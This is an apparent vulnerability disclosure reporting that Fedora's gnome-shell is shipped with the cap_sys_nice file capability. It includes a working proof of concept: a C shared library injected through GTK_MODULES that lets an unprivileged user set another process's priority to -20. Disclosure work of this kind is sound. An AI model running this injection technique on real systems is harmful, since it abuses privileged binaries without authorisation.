fedora: gnome not using fscaps safely
I happened to notice a minor issue while working a tool I'm writing, I'm not sure if gnome or the fedora package is to blame, but it seems gnome-shell is now given cap_sys_nice:
$ rpm -qf /bin/gnome-shell
gnome-shell-3.38.4-1.fc33.x86_64
$ getcap /bin/gnome-shell
/bin/gnome-shell cap_sys_nice=ep
This seems incorrect. Here is a demo, I'm just a regular user, and this pid has a priority of 0:
$ ps -heo nice -q 495980
0
I don't have permission to raise that:
$ renice -n -20 495980
renice: failed to set priority for 495980 (process ID): Permission denied
But it doesn't matter, I can just make gnome do it:
$ cat prio.c
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
void __attribute__((constructor)) init()
{
setpriority(PRIO_PROCESS, 495980, -20);
_exit(0);
}
$ gcc -fPIC -shared -o prio.so prio.c
$ env GTK_MODULES=/proc/self/cwd/prio.so /bin/gnome-shell --list-modes
And if I look at the priority now...
$ ps -heo nice -q 495980
-20
This bug is subject to a 90 day disclosure deadline. After 90 days elapse,
the bug report will become visible to the public. The scheduled disclosure
date is YYYY-MM-DD. Disclosure at an earlier date is possible if
agreed upon by all parties.
Found by: taviso@google.com